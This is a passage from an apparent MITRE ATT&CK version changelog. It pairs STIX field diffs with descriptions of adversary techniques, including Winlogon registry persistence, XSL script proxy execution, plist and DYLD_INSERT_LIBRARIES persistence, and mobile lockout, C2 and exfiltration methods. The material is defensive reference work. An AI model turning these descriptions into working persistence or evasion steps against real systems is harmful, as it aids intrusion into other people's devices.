triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon.(Citation: Cylance Reg Persistence Sept 2013) Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013) * Winlogon\Notify - points to notification package DLLs that handle Winlogon events * Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on * Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.
external_references[1]['source_name']capecCylance Reg Persistence Sept 2013
external_references[1]['url']https://capec.mitre.org/data/definitions/579.htmlhttps://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
external_references[2]['source_name']Cylance Reg Persistence Sept 2013TechNet Autoruns
external_references[2]['description']Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.
external_references[2]['url']https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-orderhttps://technet.microsoft.com/en-us/sysinternals/bb963902
external_references[3]['source_name']TechNet Autorunscapec
external_references[3]['url']https://technet.microsoft.com/en-us/sysinternals/bb963902https://capec.mitre.org/data/definitions/579.html
x_mitre_data_sources[0]Windows Registry: Windows Registry Key ModificationModule: Module Load
x_mitre_data_sources[1]Module: Module LoadWindows Registry: Windows Registry Key Modification

[T1220] XSL Script Processing

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 15:07:00.842000+00:002022-05-05 05:04:14.238000+00:00
external_references[1]['source_name']Microsoft XSLT Script Mar 2017Reaqta MSXSL Spearphishing MAR 2018
external_references[1]['description']Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using . Retrieved July 3, 2018.Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018.
external_references[1]['url']https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-scripthttps://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
external_references[2]['source_name']Microsoft msxsl.exeTwitter SquiblyTwo Detection APR 2018
external_references[2]['description']Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018.Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018.
external_references[2]['url']https://www.microsoft.com/download/details.aspx?id=21714https://twitter.com/dez_/status/986614411711442944
external_references[3]['source_name']Penetration Testing Lab MSXSL July 2017LOLBAS Wmic
external_references[3]['description']netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018.LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
external_references[3]['url']https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/https://lolbas-project.github.io/lolbas/Binaries/Wmic/
external_references[4]['source_name']Reaqta MSXSL Spearphishing MAR 2018Microsoft msxsl.exe
external_references[4]['description']Admin. (2018, March 2). Spear-phishing campaign leveraging on MSXSL. Retrieved July 3, 2018.Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe). Retrieved July 3, 2018.
external_references[4]['url']https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/https://www.microsoft.com/download/details.aspx?id=21714
external_references[5]['source_name']XSL Bypass Mar 2019Penetration Testing Lab MSXSL July 2017
external_references[5]['description']Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019.netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved July 3, 2018.
external_references[5]['url']https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
external_references[6]['source_name']LOLBAS WmicXSL Bypass Mar 2019
external_references[6]['description']LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019.
external_references[6]['url']https://lolbas-project.github.io/lolbas/Binaries/Wmic/https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
external_references[7]['source_name']Twitter SquiblyTwo Detection APR 2018Microsoft XSLT Script Mar 2017
external_references[7]['description']Desimone, J. (2018, April 18). Status Update. Retrieved July 3, 2018.Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting Using . Retrieved July 3, 2018.
external_references[7]['url']https://twitter.com/dez_/status/986614411711442944https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
x_mitre_data_sources[0]Process: Process CreationModule: Module Load
x_mitre_data_sources[1]Module: Module LoadProcess: Process Creation
x_mitre_defense_bypassed[1]Application controlDigital Certificate Validation
x_mitre_defense_bypassed[2]Digital Certificate ValidationApplication Control
Revocations

[T1053.001] At (Linux) (No parent object identified. It is likely revoked or deprecated)

Current version: 1.1

Description: Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux) An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account. Adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)

This object has been revoked by [T1053.002] At

Description for [T1053.002] At: Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at) Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM). In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 14:36:26.063000+00:002022-04-16 20:45:01.814000+00:00
revokedFalseTrue
external_references[1]['source_name']Kifarunix - Task Scheduling in Linuxrowland linux at 2019
external_references[1]['description']Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019.Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.
external_references[1]['url']https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/
external_references[3]['source_name']rowland linux at 2019Kifarunix - Task Scheduling in Linux
external_references[3]['description']Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019.
external_references[3]['url']https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/
x_mitre_data_sources[1]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[2]Process: Process CreationCommand: Command Execution

[T1547.011] Plist Modification (No parent object identified. It is likely revoked or deprecated)

Current version: 1.1

Description: Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) Adversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)

This object has been revoked by [T1647] Plist File Modification

Description for [T1647] Plist File Modification: Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description) Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)). For example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application’s info.plist file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as LSEnvironment, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 14:46:47.383000+00:002022-04-20 21:06:07.560000+00:00
revokedFalseTrue
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification

mobile-attack

New Techniques

[T1626] Abuse Elevation Control Mechanism

Current version: 1.0

Description: Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can gain on a machine. Authorization has to be granted to specific users in order to perform tasks that are designated as higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.


[T1640] Account Access Removal

Current version: 1.0

Description: Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: credentials changed) to remove access to accounts.


[T1638] Adversary-in-the-Middle

Current version: 2.0

Description: Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. If applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture.


[T1521.002] Encrypted Channel: Asymmetric Cryptography

Current version: 1.0

Description: Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private that should not be distributed. Due to how asymmetric algorithms work, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA, ElGamal, and ECDSA. For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1521/002).


[T1481.002] Web Service: Bidirectional Communication

Current version: 1.0

Description: Adversaries may use an existing, legitimate external Web service channel as a means for sending commands to and receiving output from a compromised system. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.


[T1624.001] Event Triggered Execution: Broadcast Receivers

Current version: 1.0

Description: Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities. An intent is a message passed between Android applications or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received. In addition to Android system intents, malicious applications can register for intents broadcasted by other applications. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications. In Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts)


[T1636.001] Protected User Data: Calendar Entries

Current version: 1.0

Description: Adversaries may utilize standard operating system APIs to gather calendar entry data. On Android, this can be accomplished using the Calendar Content Provider. On iOS, this can be accomplished using the `EventKit` framework. If the device has been jailbroken or rooted, an adversary may be able to access [Calendar Entries](https://attack.mitre.org/techniques/T1636/001) without the user’s knowledge or approval.


[T1636.002] Protected User Data: Call Log

Current version: 1.0

Description: Adversaries may utilize standard operating system APIs to gather call log data. On Android, this can be accomplished using the Call Log Content Provider. iOS provides no standard API to access the call log. If the device has been jailbroken or rooted, an adversary may be able to access the [Call Log](https://attack.mitre.org/techniques/T1636/002) without the user’s knowledge or approval.


[T1632.001] Subvert Trust Controls: Code Signing Policy Modification

Current version: 1.0

Description: Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys. Code signing provides a level of authenticity on an app from a developer, guaranteeing that the program has not been tampered with and comes from an official source. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on a device. Mobile devices generally enable these security controls by default, such as preventing the installation of unknown applications on Android. Adversaries may modify these policies in a number of ways, including [Input Injection](https://attack.mitre.org/techniques/T1516) or malicious configuration profiles.


[T1623] Command and Scripting Interpreter

Current version: 1.0

Description: Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, Android is a UNIX-like OS and includes a basic [Unix Shell](https://attack.mitre.org/techniques/T1623/001) that can be accessed via the Android Debug Bridge (ADB) or Java’s `Runtime` package. Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0027) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.


[T1645] Compromise Client Software Binary

Current version: 1.0

Description: Adversaries may modify system software binaries to establish persistent access to devices. System software binaries are used by the underlying operating system and users over adb or terminal emulators. Adversaries may make modifications to client software binaries to carry out malicious tasks when those binaries are executed. For example, malware may come with a pre-compiled malicious binary intended to overwrite the genuine one on the device. Since these binaries may be routinely executed by the system or user, the adversary can leverage this for persistent access to the device.


[T1474.002] Supply Chain Compromise: Compromise Hardware Supply Chain

Current version: 1.0

Description: Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system.


[T1474.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools

Current version: 1.0

Description: Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Grace-Advertisement)


[T1474.003] Supply Chain Compromise: Compromise Software Supply Chain

Current version: 1.0

Description: Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.


[T1636.003] Protected User Data: Contact List

Current version: 1.0

Description: Adversaries may utilize standard operating system APIs to gather contact list data. On Android, this can be accomplished using the Contacts Content Provider. On iOS, this can be accomplished using the `Contacts` framework. If the device has been jailbroken or rooted, an adversary may be able to access the [Contact List](https://attack.mitre.org/techniques/T1636/003) without the user’s knowledge or approval.


[T1634] Credentials from Password Store

Current version: 1.0

Description: Adversaries may search common password storage locations to obtain user credentials. Passwords can be stored in several places on a device, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.


[T1641] Data Manipulation

Current version: 1.0

Description: Adversaries may insert, delete, or alter data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application, process, and the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.


[T1481.001] Web Service: Dead Drop Resolver

Current version: 1.0

Description: Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers. Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis, or enable operational resiliency (since this infrastructure may be dynamically changed).


[T1626.001] Abuse Elevation Control Mechanism: Device Administrator Permissions

Current version: 1.0

Description: Adversaries may abuse Android’s device administration API to obtain a higher degree of control over the device. By abusing the API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642), factory resetting the device for [File Deletion](https://attack.mitre.org/techniques/T1630/002) and to delete any traces of the malware, disabling all the device’s cameras, or to make it more difficult to uninstall the app. Device administrators must be approved by the user at runtime, with a system popup showing which actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.


[T1629.002] Impair Defenses: Device Lockout

Current version: 1.0

Description: An adversary may seek to inhibit user interaction by locking the legitimate user out of the device. This is typically accomplished by requesting device administrator permissions and then locking the screen using `DevicePolicyManager.lockNow()`. Other novel techniques for locking the user out of the device have been observed, such as showing a persistent overlay, using carefully crafted “call” notification screens, and locking HTML pages in the foreground. These techniques can be very difficult to get around, and typically require booting the device into safe mode to uninstall the malware.(Citation: Microsoft MalLockerB)(Citation: Talos GPlayed)(Citation: securelist rotexy 2018) Prior to Android 7, device administrators were able to reset the device lock passcode to prevent the user from unlocking the device. The release of Android 7 introduced updates that only allow device or profile owners (e.g. MDMs) to reset the device’s passcode.(Citation: Android resetPassword)


[T1629.003] Impair Defenses: Disable or Modify Tools

Current version: 1.0

Description: Adversaries may disable security tools to avoid potential detection of their tools and activities. This can take the form of disabling security software, modifying SELinux configuration, or other methods to interfere with security tools scanning or reporting information. This is typically done by abusing device administrator permissions or using system exploits to gain root access to the device to modify protected system files.


[T1630.003] Indicator Removal on Host: Disguise Root/Jailbreak Indicators

Current version: 1.0

Description: An adversary could use knowledge of the techniques used by security software to evade detection.(Citation: Brodie)(Citation: Tan) For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed "su" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection.(Citation: Rastogi)


[T1637.001] Dynamic Resolution: Domain Generation Algorithms

Current version: 1.0

Description: Adversaries may use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1637/001) (DGAs) to procedurally generate domain names for uses such as command and control communication or malicious application distribution.(Citation: securelist rotexy 2018) DGAs increase the difficulty for defenders to block, track, or take over the command and control channel, as there could potentially be thousands of domains that malware can check for instructions.


[T1637] Dynamic Resolution

Current version: 1.0

Description: Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. This algorithm can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.


[T1642] Endpoint Denial of Service

Current version: 1.0

Description: Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. On Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode, preventing the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android resetPassword) On iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode; they cannot set a new passcode. However, on jailbroken devices, malware has been discovered that can lock the user out of the device.(Citation: Xiao-KeyRaider)


[T1624] Event Triggered Execution

Current version: 1.0

Description: Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities. Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via automatically and repeatedly executing malicious code. After gaining access to a victim’s system, adversaries may create or modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.


[T1627] Execution Guardrails

Current version: 1.0

Description: Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include environment information such as location.(Citation: SWB Exodus March 2019) Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [System Checks](https://attack.mitre.org/techniques/T1633/001). While use of [System Checks](https://attack.mitre.org/techniques/T1633/001) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.


[T1639] Exfiltration Over Alternative Protocol

Current version: 1.0

Description: Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may opt to also encrypt and/or obfuscate these alternate channels.


[T1646] Exfiltration Over C2 Channel

Current version: 1.0

Description: Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.


[T1639.001] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

Current version: 1.0

Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.


[T1630.002] Indicator Removal on Host: File Deletion

Current version: 1.0

Description: Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location.(Citation: Android DevicePolicyManager 2019) Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.


[T1417.002] Input Capture: GUI Input Capture

Current version: 1.0

Description: Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices) There are several approaches adversaries may use to mimic this functionality. Adversaries may impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and, when installed on the device, may prompt the user for sensitive information.(Citation: eset-finance) Adversaries may also send fake device notifications to the user that may trigger the display of an input prompt when clicked.(Citation: Group IB Gustuff Mar 2019) Additionally, adversaries may display a prompt on top of a running, legitimate application to trick users into entering sensitive information into a malicious application rather than the legitimate application. Typically, adversaries need to know when the targeted application and the individual activity within the targeted application is running in the foreground to display the prompt at the proper time. Adversaries can abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Two known approaches to displaying a prompt include: * Adversaries start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background) * Adversaries create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions and, at least under certain conditions, is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)


[T1643] Generate Traffic from Victim

Current version: 1.0

Description: Adversaries may generate outbound traffic from devices. This is typically performed to manipulate external outcomes, such as to achieve carrier billing fraud or to manipulate app store rankings or ratings. Outbound traffic is typically generated as SMS messages or general web traffic, but may take other forms as well. If done via SMS messages, Android apps must hold the `SEND_SMS` permission. Additionally, sending an SMS message requires user consent if the recipient is a premium number. Applications cannot send SMS messages on iOS


[T1627.001] Execution Guardrails: Geofencing

Current version: 1.0

Description: Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv) [Geofencing](https://attack.mitre.org/techniques/T1627/001) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements. One method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1627/001) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1627/001) methods, this requires that the user has granted the `ACCESS_FINE_LOCATION` and `ACCESS_BACKGROUND_LOCATION` permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include "Allow only while using the app", which will effectively prohibit background location collection. Similarly, on iOS, developers can use built-in APIs to setup and execute geofencing. Depending on the use case, the app will either need to call `requestWhenInUseAuthorization()` or `requestAlwaysAuthorization()`, depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground. [Geofencing](https://attack.mitre.org/techniques/T1627/001) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or 